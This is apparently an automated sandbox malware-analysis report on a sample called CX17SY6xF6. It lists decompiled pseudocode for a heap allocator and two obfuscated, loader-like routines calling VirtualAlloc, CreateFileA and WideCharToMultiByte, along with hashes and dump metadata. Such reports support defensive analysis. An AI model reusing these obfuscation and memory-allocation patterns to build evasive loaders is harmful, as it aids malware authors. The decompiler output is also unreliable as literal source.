                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0E931704321EBEF615B6A9800A9B3F89BFE8670B044065F9D6EB190DB30D40086E4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 299 10dbd19-10dbd25 300 10dbd57-10dbd62 call 10d9826 299->300 301 10dbd27-10dbd29 299->301 308 10dbd64-10dbd66 300->308 303 10dbd2b-10dbd2c 301->303 304 10dbd42-10dbd53 RtlAllocateHeap 301->304 303->304 306 10dbd2e-10dbd35 call 10dc742 304->306 307 10dbd55 304->307 306->300 311 10dbd37-10dbd40 call 10dc6ac 306->311 307->308 311->300 311->304
                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                    			E010DBD19(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                    				long _t8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t7 = __ecx;
                                                                                                                                                                                                                                                    				_t8 = _a4;
                                                                                                                                                                                                                                                    				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(E010D9826())) = 0xc;
                                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                                                                    					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t4 = RtlAllocateHeap( *0x116e1b0, 0, _t8); // executed
                                                                                                                                                                                                                                                    					if(_t4 != 0) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					__eflags = E010DC742();
                                                                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t6 = E010DC6AC(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                    					_pop(_t7);
                                                                                                                                                                                                                                                    					__eflags = _t6;
                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x010dbd19
                                                                                                                                                                                                                                                    0x010dbd1f
                                                                                                                                                                                                                                                    0x010dbd25
                                                                                                                                                                                                                                                    0x010dbd57
                                                                                                                                                                                                                                                    0x010dbd5c
                                                                                                                                                                                                                                                    0x010dbd62
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbd62
                                                                                                                                                                                                                                                    0x010dbd29
                                                                                                                                                                                                                                                    0x010dbd2b
                                                                                                                                                                                                                                                    0x010dbd2b
                                                                                                                                                                                                                                                    0x010dbd42
                                                                                                                                                                                                                                                    0x010dbd4b
                                                                                                                                                                                                                                                    0x010dbd53
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbd33
                                                                                                                                                                                                                                                    0x010dbd35
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbd38
                                                                                                                                                                                                                                                    0x010dbd3d
                                                                                                                                                                                                                                                    0x010dbd3e
                                                                                                                                                                                                                                                    0x010dbd40
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010dbd40
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,010DA5A1,00000000), ref: 010DBD4B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 449f5bffe24e75e1c2ad893ff2823bcfc1253cbbc7b78d40d3460a74173c8a4a
                                                                                                                                                                                                                                                    • Instruction ID: 357a2ba785259e5b184b95842ef591424f9971c5763360c737dc7e0a68b54e78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 449f5bffe24e75e1c2ad893ff2823bcfc1253cbbc7b78d40d3460a74173c8a4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37E065315053259BEA7136AA9D00BAA3BCCAB436A0F570161EDD59A1A0FB21D80082E6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 315 10d47e0-10d4843 316 10d48ef-10d48f5 315->316 317 10d4849-10d4856 315->317 320 10d4900-10d4912 316->320 318 10d4889-10d48be VirtualAlloc 317->318 319 10d4858-10d4887 317->319 321 10d48c3-10d48ea 318->321 319->321 322 10d4984-10d498d 320->322 323 10d4914-10d492c 320->323 321->322 324 10d4937-10d4957 323->324 325 10d497f 324->325 326 10d4959-10d497d 324->326 325->320 326->324
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010D47E0(signed int _a4, intOrPtr _a8, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                    				intOrPtr _t94;
                                                                                                                                                                                                                                                    				intOrPtr _t107;
                                                                                                                                                                                                                                                    				intOrPtr _t123;
                                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v28 = _a16 - 0x2598;
                                                                                                                                                                                                                                                    				_v36 = _a24 + 0x14d;
                                                                                                                                                                                                                                                    				_v24 = _a20 - 0xce;
                                                                                                                                                                                                                                                    				_v8 = _a4 ^ 0x000002bf;
                                                                                                                                                                                                                                                    				_v40 = _a24 + 0x221;
                                                                                                                                                                                                                                                    				_v16 = _a16 ^ 0x00000221;
                                                                                                                                                                                                                                                    				_v32 = _a20 + 0x1ce;
                                                                                                                                                                                                                                                    				if(_v8 == _v40 - 0x219) {
                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                    					while(_v12 < (_v16 & 0x0000253b) - 0x2633) {
                                                                                                                                                                                                                                                    						_t94 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_v20 =  *((intOrPtr*)(_t94 + 0xbadc65));
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							_t74 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							if(_v20 <= (_v16 | 0x00002801) +  *((intOrPtr*)(_t74 + 0xbadc81))) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v24 = ( *(_a8 + 0xec) & 0x00002796) -  *((intOrPtr*)(_a8 + 0xbadbed)) + _v24;
                                                                                                                                                                                                                                                    							_v20 = _v20 + 3;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v12 = _v12 + 4;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a8 + 0xb0)) <= 0xd708) {
                                                                                                                                                                                                                                                    						_v48 = 0x3000;
                                                                                                                                                                                                                                                    						_t123 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t26 = _t123 + 0x8c; // 0x0
                                                                                                                                                                                                                                                    						_v44 =  *_t26 + 0x40;
                                                                                                                                                                                                                                                    						_t82 = VirtualAlloc(0,  *(_a8 + 0x24), _v48, _v44); // executed
                                                                                                                                                                                                                                                    						 *0x116d684 = _t82 + 0x2000;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t87 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t23 = _t87 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t107 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t107 + 0xdc) = ( *(_a8 + 0x9c) ^  *(_a8 + 0x8c)) + 0x0001cd0c |  *_t23;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t84 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t34 = _t84 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                    					_t127 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t127 + 0x5c)) =  *_t34 +  *(_a8 + 0x8c) - 0x4b764;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v32 ^ 0x0000003b;
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x010d47ee
                                                                                                                                                                                                                                                    0x010d47fa
                                                                                                                                                                                                                                                    0x010d4806
                                                                                                                                                                                                                                                    0x010d4811
                                                                                                                                                                                                                                                    0x010d481d
                                                                                                                                                                                                                                                    0x010d4829
                                                                                                                                                                                                                                                    0x010d4834
                                                                                                                                                                                                                                                    0x010d4843
                                                                                                                                                                                                                                                    0x010d48f2
                                                                                                                                                                                                                                                    0x010d4900
                                                                                                                                                                                                                                                    0x010d491c
                                                                                                                                                                                                                                                    0x010d4929
                                                                                                                                                                                                                                                    0x010d4937
                                                                                                                                                                                                                                                    0x010d4948
                                                                                                                                                                                                                                                    0x010d4957
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d497a
                                                                                                                                                                                                                                                    0x010d4934
                                                                                                                                                                                                                                                    0x010d4934
                                                                                                                                                                                                                                                    0x010d48fd
                                                                                                                                                                                                                                                    0x010d48fd
                                                                                                                                                                                                                                                    0x010d4849
                                                                                                                                                                                                                                                    0x010d4856
                                                                                                                                                                                                                                                    0x010d4889
                                                                                                                                                                                                                                                    0x010d4890
                                                                                                                                                                                                                                                    0x010d4896
                                                                                                                                                                                                                                                    0x010d489f
                                                                                                                                                                                                                                                    0x010d48b3
                                                                                                                                                                                                                                                    0x010d48be
                                                                                                                                                                                                                                                    0x010d4858
                                                                                                                                                                                                                                                    0x010d4870
                                                                                                                                                                                                                                                    0x010d4875
                                                                                                                                                                                                                                                    0x010d487b
                                                                                                                                                                                                                                                    0x010d4881
                                                                                                                                                                                                                                                    0x010d4881
                                                                                                                                                                                                                                                    0x010d48c9
                                                                                                                                                                                                                                                    0x010d48ce
                                                                                                                                                                                                                                                    0x010d48e1
                                                                                                                                                                                                                                                    0x010d48e7
                                                                                                                                                                                                                                                    0x010d48e7
                                                                                                                                                                                                                                                    0x010d498d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,?), ref: 010D48B3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 7b0a2dc1b6b77930e7ca87b99b6b0c805da7631444b1f4f017382d04709f153a
                                                                                                                                                                                                                                                    • Instruction ID: 7c4af7debc04e59c1796ccf809831889e8eb191aea07971223e78fef342ef668
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b0a2dc1b6b77930e7ca87b99b6b0c805da7631444b1f4f017382d04709f153a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A51DA70A00209DFEB08CF98D594BADBBB2FB88304F14C27AD855AB745D735A951CF94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                    			E010D2800(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				void* _v72;
                                                                                                                                                                                                                                                    				long _v76;
                                                                                                                                                                                                                                                    				long _v80;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v84;
                                                                                                                                                                                                                                                    				long _v88;
                                                                                                                                                                                                                                                    				long _v92;
                                                                                                                                                                                                                                                    				CHAR* _v96;
                                                                                                                                                                                                                                                    				int* _v100;
                                                                                                                                                                                                                                                    				char* _v104;
                                                                                                                                                                                                                                                    				int _v108;
                                                                                                                                                                                                                                                    				char* _v112;
                                                                                                                                                                                                                                                    				int _v116;
                                                                                                                                                                                                                                                    				short* _v120;
                                                                                                                                                                                                                                                    				int _v124;
                                                                                                                                                                                                                                                    				int _v128;
                                                                                                                                                                                                                                                    				intOrPtr _t296;
                                                                                                                                                                                                                                                    				intOrPtr _t331;
                                                                                                                                                                                                                                                    				intOrPtr _t332;
                                                                                                                                                                                                                                                    				intOrPtr _t345;
                                                                                                                                                                                                                                                    				intOrPtr _t350;
                                                                                                                                                                                                                                                    				intOrPtr _t360;
                                                                                                                                                                                                                                                    				intOrPtr _t376;
                                                                                                                                                                                                                                                    				signed int _t414;
                                                                                                                                                                                                                                                    				intOrPtr _t446;
                                                                                                                                                                                                                                                    				intOrPtr _t454;
                                                                                                                                                                                                                                                    				intOrPtr _t468;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a20 - 0x2796;
                                                                                                                                                                                                                                                    				_v32 = _a8 + 0x254;
                                                                                                                                                                                                                                                    				_v16 = _a12 - 0x2506;
                                                                                                                                                                                                                                                    				_v12 = _a16 ^ 0x000026e5;
                                                                                                                                                                                                                                                    				_v20 = _a8 ^ 0x00002565;
                                                                                                                                                                                                                                                    				_v24 = _a12;
                                                                                                                                                                                                                                                    				_v28 = _a24 - 0x54;
                                                                                                                                                                                                                                                    				if(_v20 > _v16 + 0x2633) {
                                                                                                                                                                                                                                                    					_v36 = _v8;
                                                                                                                                                                                                                                                    					while(_v36 >= ( *(_a4 + 0x9c) ^  *(_a4 + 0x50))) {
                                                                                                                                                                                                                                                    						 *(_a4 + 0xf4) = _v28 | _v28 |  *(_a4 + 0xf4);
                                                                                                                                                                                                                                                    						_t331 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t332 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t332 + 0xbadca9)) =  *((intOrPtr*)(_t331 + 0xbadca9)) - (_v20 | _v16);
                                                                                                                                                                                                                                                    						 *0x116d6a0 =  *(_a4 + 0x38) - _v32;
                                                                                                                                                                                                                                                    						_v68 = _v12 - 0x00002565 ^ _v16;
                                                                                                                                                                                                                                                    						__imp__GetCurrentActCtx(_v68);
                                                                                                                                                                                                                                                    						_v96 =  *(_a4 + 0xbadbc1) ^ _v28 | _v20;
                                                                                                                                                                                                                                                    						_v92 = _v20 *  *(_a4 + 0x38) - 0x2628;
                                                                                                                                                                                                                                                    						_t414 =  *0x116d6cc; // 0x8
                                                                                                                                                                                                                                                    						_v88 = (_t414 | 0x000025a0) ^  *(_a4 + 0x4c);
                                                                                                                                                                                                                                                    						_v84 = _v12 -  *((intOrPtr*)(_a4 + 0xdc)) | 0x00002598;
                                                                                                                                                                                                                                                    						_v80 = _v16 -  *0x0116D620;
                                                                                                                                                                                                                                                    						_v76 = _v24 +  *((intOrPtr*)(_a4 + 0x8c));
                                                                                                                                                                                                                                                    						_t345 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t180 = _t345 + 0x9c; // 0x14b95e
                                                                                                                                                                                                                                                    						_v72 =  *((intOrPtr*)(_a4 + 0xdc)) +  *_t180;
                                                                                                                                                                                                                                                    						CreateFileA(_v96, _v92, _v88, _v84, _v80, _v76, _v72);
                                                                                                                                                                                                                                                    						_v16 = (_v8 * 0x27b9 +  *((intOrPtr*)(_a4 + 0xbadc71))) * _v16;
                                                                                                                                                                                                                                                    						_t350 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_v128 = ( *(_t350 + 0xbadbed) &  *(_a4 + 0xac)) * 0x283a;
                                                                                                                                                                                                                                                    						_v124 = _v8 - _v20 & _v28;
                                                                                                                                                                                                                                                    						_v120 =  *0x0116D6B4 | _v12 | 0x000025a0;
                                                                                                                                                                                                                                                    						_v116 = _v8 * _v24;
                                                                                                                                                                                                                                                    						_v112 =  *(_a4 + 0xb4) ^  *0x01D1B271 | 0x00002674;
                                                                                                                                                                                                                                                    						_v108 = _v20 - _v32 - 0x26e5;
                                                                                                                                                                                                                                                    						_v104 = _v24 +  *(_a4 + 0xec) |  *(_a4 + 0xb0);
                                                                                                                                                                                                                                                    						_t360 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_v100 =  *(_a4 + 0xb4) + _v24 -  *((intOrPtr*)(_t360 + 4));
                                                                                                                                                                                                                                                    						WideCharToMultiByte(_v128, _v124, _v120, _v116, _v112, _v108, _v104, _v100);
                                                                                                                                                                                                                                                    						_v36 = _v36 + 3;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v8 = _v8 ^ 0x00002565;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0x10)) = 0xa;
                                                                                                                                                                                                                                                    					 *0x0116D604 = 1;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xbadbdd) = 1;
                                                                                                                                                                                                                                                    					 *(_a4 + 0x38) = 1;
                                                                                                                                                                                                                                                    					_t446 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t446 + 0x3c)) = 0x4e;
                                                                                                                                                                                                                                                    					 *0x0116D630 = 1;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xbadbfd)) = 2;
                                                                                                                                                                                                                                                    					 *0x0116D664 = 0;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0x78)) = 0xe;
                                                                                                                                                                                                                                                    					 *0x0116D66C = 0xa;
                                                                                                                                                                                                                                                    					 *0x116d67c = 0;
                                                                                                                                                                                                                                                    					_t296 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t296 + 0x9c)) = 0x20;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xa4) = 0;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xac) = 1;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xb0) = 0;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xb4) = 0;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xb8)) = 0xf;
                                                                                                                                                                                                                                                    					_t454 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *(_t454 + 0xbadc71) = 1;
                                                                                                                                                                                                                                                    					_t376 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t376 + 0xbadc81)) = 0x26;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xdc)) = 8;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xe0)) = 2;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0xe4)) = 0xc;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xec) = 1;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xf4) = 0;
                                                                                                                                                                                                                                                    					 *(_a4 + 0xfc) = 1;
                                                                                                                                                                                                                                                    					_v16 = _v16 ^ 0x000026d4;
                                                                                                                                                                                                                                                    					_v16 = _v16 + 0xe5;
                                                                                                                                                                                                                                                    					_v20 = _v20 + 0x2674;
                                                                                                                                                                                                                                                    					_v28 = _v28 ^ 0x00000047;
                                                                                                                                                                                                                                                    					_v12 = _v12 ^ 0x00002628;
                                                                                                                                                                                                                                                    					_v32 = _v32 - 0x145;
                                                                                                                                                                                                                                                    					_v24 = _v24 + 0x181;
                                                                                                                                                                                                                                                    					_v24 = _v24 + 0x10f;
                                                                                                                                                                                                                                                    					_v20 = _v20 ^ 0x000001cd;
                                                                                                                                                                                                                                                    					_v8 = _v8 ^ 0x000003b1;
                                                                                                                                                                                                                                                    					_v8 = _v8 + 0x166;
                                                                                                                                                                                                                                                    					_v12 = _v12 + 0x4c;
                                                                                                                                                                                                                                                    					_v12 = _v12 ^ 0x000001e2;
                                                                                                                                                                                                                                                    					_v28 = _v28 - 0x139;
                                                                                                                                                                                                                                                    					_t468 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_v64 = _t468;
                                                                                                                                                                                                                                                    					_v60 = _v12;
                                                                                                                                                                                                                                                    					_v56 = _v20 + 0x81;
                                                                                                                                                                                                                                                    					_v52 = _v12 - 0x231;
                                                                                                                                                                                                                                                    					_v48 = _v12 - 0x25b;
                                                                                                                                                                                                                                                    					_v44 = _v16;
                                                                                                                                                                                                                                                    					_v40 = _v12 - 0x122;
                                                                                                                                                                                                                                                    					_v8 = E010E8850(_v64, _v60, _v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                    					_v24 = _v24 - 0x1fe;
                                                                                                                                                                                                                                                    					_v32 = _v32 ^ 0x000002b3;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v32 + 0x373;
                                                                                                                                                                                                                                                    			}













































                                                                                                                                                                                                                                                    0x010d280e
                                                                                                                                                                                                                                                    0x010d281a
                                                                                                                                                                                                                                                    0x010d2826
                                                                                                                                                                                                                                                    0x010d2831
                                                                                                                                                                                                                                                    0x010d283d
                                                                                                                                                                                                                                                    0x010d2843
                                                                                                                                                                                                                                                    0x010d284c
                                                                                                                                                                                                                                                    0x010d285b
                                                                                                                                                                                                                                                    0x010d2b38
                                                                                                                                                                                                                                                    0x010d2b46
                                                                                                                                                                                                                                                    0x010d2b79
                                                                                                                                                                                                                                                    0x010d2b8d
                                                                                                                                                                                                                                                    0x010d2ba4
                                                                                                                                                                                                                                                    0x010d2baa
                                                                                                                                                                                                                                                    0x010d2bba
                                                                                                                                                                                                                                                    0x010d2bcb
                                                                                                                                                                                                                                                    0x010d2bd2
                                                                                                                                                                                                                                                    0x010d2bed
                                                                                                                                                                                                                                                    0x010d2c00
                                                                                                                                                                                                                                                    0x010d2c03
                                                                                                                                                                                                                                                    0x010d2c1e
                                                                                                                                                                                                                                                    0x010d2c33
                                                                                                                                                                                                                                                    0x010d2c47
                                                                                                                                                                                                                                                    0x010d2c56
                                                                                                                                                                                                                                                    0x010d2c62
                                                                                                                                                                                                                                                    0x010d2c68
                                                                                                                                                                                                                                                    0x010d2c6e
                                                                                                                                                                                                                                                    0x010d2c8d
                                                                                                                                                                                                                                                    0x010d2caf
                                                                                                                                                                                                                                                    0x010d2cba
                                                                                                                                                                                                                                                    0x010d2cd3
                                                                                                                                                                                                                                                    0x010d2cdf
                                                                                                                                                                                                                                                    0x010d2cf9
                                                                                                                                                                                                                                                    0x010d2d03
                                                                                                                                                                                                                                                    0x010d2d22
                                                                                                                                                                                                                                                    0x010d2d31
                                                                                                                                                                                                                                                    0x010d2d49
                                                                                                                                                                                                                                                    0x010d2d60
                                                                                                                                                                                                                                                    0x010d2d6a
                                                                                                                                                                                                                                                    0x010d2d8d
                                                                                                                                                                                                                                                    0x010d2b43
                                                                                                                                                                                                                                                    0x010d2b43
                                                                                                                                                                                                                                                    0x010d2861
                                                                                                                                                                                                                                                    0x010d286a
                                                                                                                                                                                                                                                    0x010d2878
                                                                                                                                                                                                                                                    0x010d2888
                                                                                                                                                                                                                                                    0x010d289d
                                                                                                                                                                                                                                                    0x010d28a8
                                                                                                                                                                                                                                                    0x010d28af
                                                                                                                                                                                                                                                    0x010d28b5
                                                                                                                                                                                                                                                    0x010d28c4
                                                                                                                                                                                                                                                    0x010d28d9
                                                                                                                                                                                                                                                    0x010d28e9
                                                                                                                                                                                                                                                    0x010d28f6
                                                                                                                                                                                                                                                    0x010d2905
                                                                                                                                                                                                                                                    0x010d290f
                                                                                                                                                                                                                                                    0x010d2919
                                                                                                                                                                                                                                                    0x010d291e
                                                                                                                                                                                                                                                    0x010d2933
                                                                                                                                                                                                                                                    0x010d2941
                                                                                                                                                                                                                                                    0x010d294e
                                                                                                                                                                                                                                                    0x010d295b
                                                                                                                                                                                                                                                    0x010d2970
                                                                                                                                                                                                                                                    0x010d2982
                                                                                                                                                                                                                                                    0x010d2988
                                                                                                                                                                                                                                                    0x010d299b
                                                                                                                                                                                                                                                    0x010d29a1
                                                                                                                                                                                                                                                    0x010d29af
                                                                                                                                                                                                                                                    0x010d29bc
                                                                                                                                                                                                                                                    0x010d29c9
                                                                                                                                                                                                                                                    0x010d29d6
                                                                                                                                                                                                                                                    0x010d29e3
                                                                                                                                                                                                                                                    0x010d29f8
                                                                                                                                                                                                                                                    0x010d2a0c
                                                                                                                                                                                                                                                    0x010d2a18
                                                                                                                                                                                                                                                    0x010d2a23
                                                                                                                                                                                                                                                    0x010d2a32
                                                                                                                                                                                                                                                    0x010d2a3d
                                                                                                                                                                                                                                                    0x010d2a49
                                                                                                                                                                                                                                                    0x010d2a55
                                                                                                                                                                                                                                                    0x010d2a60
                                                                                                                                                                                                                                                    0x010d2a6c
                                                                                                                                                                                                                                                    0x010d2a78
                                                                                                                                                                                                                                                    0x010d2a83
